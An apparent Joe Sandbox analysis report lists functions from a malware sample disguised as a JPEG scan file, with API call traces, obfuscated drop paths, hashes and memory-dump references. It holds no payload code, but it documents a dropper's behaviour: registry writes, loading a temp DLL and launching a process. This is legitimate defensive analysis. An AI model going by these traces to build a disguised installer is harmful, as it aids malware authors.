API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 641966b4e0170f88d991de00eb44997f06ea8c8494bd21b68bf19f84c0f2e76b
Instruction ID: dd42f562c64be1f9593e7e3b16cb43ae92b04c04455db9469daeefc4abd069bc
Opcode Fuzzy Hash: 641966b4e0170f88d991de00eb44997f06ea8c8494bd21b68bf19f84c0f2e76b
Instruction Fuzzy Hash: FA419D71104216DADB11BFB5CD84BAA3BACBB16328F0CD424FA599A182DBB4D045C7B4

Function 004023D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm54DF.tmp,00000023,00000011,00000002), ref: 00402421
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsm54DF.tmp,00000000,00000011,00000002), ref: 0040245E
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsm54DF.tmp,00000000,00000011,00000002), ref: 00402542

Strings

C:\Users\user\AppData\Local\Temp\nsm54DF.tmp, xrefs: 00402412, 00402434, 00402448, 00402453

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp
API String ID: 2655323295-93809639
Opcode ID: 9b26400be6dbbbb49eeb1923877ef4174091b91fb929c0756af875ffc579e184
Instruction ID: 1fc307ab1697ef986dd5cd2868f3fef353c7a70d956ff55dcab5481d81c0b37e
Opcode Fuzzy Hash: 9b26400be6dbbbb49eeb1923877ef4174091b91fb929c0756af875ffc579e184
Instruction Fuzzy Hash: E2119371E00115BEDF10EFA5DE49AAEBA74EB54318F20843BF504F71D1C6B95D419B28

Function 00402003 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 0040202E

Part of subcall function 00405091: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
Part of subcall function 00405091: lstrlenA.KERNEL32(004030CC,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
Part of subcall function 00405091: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,004030CC,004030CC,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,00000000,0040E8C0,00000000), ref: 004050ED
Part of subcall function 00405091: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll), ref: 004050FF
Part of subcall function 00405091: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
Part of subcall function 00405091: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
Part of subcall function 00405091: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040203E
GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 23d1d6007855e727fc8cd3913e41b4a50d01db3cb65b56c6734e8942852e25e6
Instruction ID: fd60b9c6cfc4bddbe94fc7e5a8503348695d94644a3847b69ed94d97695b539d
Opcode Fuzzy Hash: 23d1d6007855e727fc8cd3913e41b4a50d01db3cb65b56c6734e8942852e25e6
Instruction Fuzzy Hash: BC21C971A00215BBCF207FA48E49BAE75B0AB54359F20413BF601B22D0C6BD4A42D66E

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 0040599B: CharNextA.USER32(?,?,shovel\Undrinking.veg,?,00405A07,shovel\Undrinking.veg,shovel\Undrinking.veg,75953410,?,C:\Users\user\AppData\Local\Temp\,00405752,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A9
Part of subcall function 0040599B: CharNextA.USER32(00000000), ref: 004059AE
Part of subcall function 0040599B: CharNextA.USER32(00000000), ref: 004059C2

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 00405557: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040559A

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers, xrefs: 00401631

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers
API String ID: 1892508949-496868922
Opcode ID: 77366072376007a81e873d624303f28143037452507457246f6624776d99043d
Instruction ID: 1397d73bc892ae661a741dfecf38a44b6d03d9e6e7f57cd6dcc913c124f66756
Opcode Fuzzy Hash: 77366072376007a81e873d624303f28143037452507457246f6624776d99043d
Instruction Fuzzy Hash: 59110431608152EBCF217FA55C415BF66B09A96324B28093FE5D2B22E2D63D4E43973F

Function 00405609 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 00405632
CloseHandle.KERNEL32(?), ref: 0040563F

Strings

Error launching installer, xrefs: 0040561C

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction ID: 9728a5d5e843408a2f651da6c1778568bac2657747ba6051cf584ee7dfff0d45
Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction Fuzzy Hash: B0E046F0A00209BFEB009B60EC09F7B7AACEB10748F404861BD11F32A0E374A9108A79

Function 00406A2B Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2818476e1d6469588ef8d75e2f77556e52d803f704a1a77dfe7aba4081c4173
Instruction ID: ffc4466fd7e1a84d1c0fc4b16d1a76bfc4ed23806840a2aa82a83de6544419ef
Opcode Fuzzy Hash: b2818476e1d6469588ef8d75e2f77556e52d803f704a1a77dfe7aba4081c4173
Instruction Fuzzy Hash: D6A15371E00229DBDF28CFA8C8547ADBBB1FF44305F15802AD856BB281C7789A96DF44

Function 00406C2C Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56f2a3a3000d6c7273ab2248f4ff10f601781423d0ca2bb331c25efff9829afe
Instruction ID: 3b3aa2dd6ba4133719dd3176c6350ec32f9f513342808bce88e7bfcf8f6a0710
Opcode Fuzzy Hash: 56f2a3a3000d6c7273ab2248f4ff10f601781423d0ca2bb331c25efff9829afe
Instruction Fuzzy Hash: F4913370E00229DBDF28CF98C8587ADBBB1FF44305F15802AD852BB291C7789A96DF44

Function 00406942 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc8b0fe229dbff43726b3aa98382c4509895189392f9f8db1d3ee082f796570
Instruction ID: 583e61d198cc77022754fa770bf55cdcc509db116518bb017f27c6a68360c261
Opcode Fuzzy Hash: 7fc8b0fe229dbff43726b3aa98382c4509895189392f9f8db1d3ee082f796570
Instruction Fuzzy Hash: B9814471D04229DBDF24CFA8C884BADBBB1FF44305F25816AD446BB281C7389A96DF54

Function 00406447 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27bf3f2d71280db305e6514bcdeee96470c11e7b3e186f58d433be2447d111a6
Instruction ID: 20cbf149701654aecfc40dff313aa48f1da8dd35a22a44c357500b5e58bb095b
Opcode Fuzzy Hash: 27bf3f2d71280db305e6514bcdeee96470c11e7b3e186f58d433be2447d111a6
Instruction Fuzzy Hash: 1B816571D04229DBDF28CFA8C844BADBBB0FF44305F21816AD856BB281C7785A96DF54

Function 00406895 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7de7d62d5bd7f5964df27a39736f706d5b0cb98cf3e46e90e0dfc1ab4ed8f1c
Instruction ID: 803a34037b0f7f5be0b8e0f61a876c36f0b5510bb0b2ab0f73e67388892f039f
Opcode Fuzzy Hash: f7de7d62d5bd7f5964df27a39736f706d5b0cb98cf3e46e90e0dfc1ab4ed8f1c
Instruction Fuzzy Hash: 95710471D04229DBDF24CFA8C8447ADBBB1FB44305F15806AD846BB281D7385A96DF54

Function 004069B3 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e17704cfcf72c8df979941797e4b0b3defb04d6abbfe177bdd58f92bded9ed7
Instruction ID: ad71f402e4a9b92a37c553ea73d368b4d72ad24497358f0b079e3127edd250f9
Opcode Fuzzy Hash: 8e17704cfcf72c8df979941797e4b0b3defb04d6abbfe177bdd58f92bded9ed7
Instruction Fuzzy Hash: 5D713571D04229DBDF28CF98C844BADBBB1FF44305F15806AD856BB281C7389A96DF54

Function 004068FF Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 721cf2a7e84b7ceee3b40c5675287f3d3981b6f25cb9f163efdac731e148116f
Instruction ID: 5c7df32a9af3fd0bcd177ef93077855236352ac101eaea0ca8dc2b1de7da3dc3
Opcode Fuzzy Hash: 721cf2a7e84b7ceee3b40c5675287f3d3981b6f25cb9f163efdac731e148116f
Instruction Fuzzy Hash: B5715571D04229DBEF28CF98C844BADBBB1FF44305F15806AD842BB281C7389A96DF44

Function 6DDA29C0 Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

APIs

EnumResourceTypesA.KERNEL32(00000000), ref: 6DDA2A7F
GetLastError.KERNEL32 ref: 6DDA2B86

Memory Dump Source

Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true

Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: EnumErrorLastResourceTypes
String ID:
API String ID: 1485949383-0
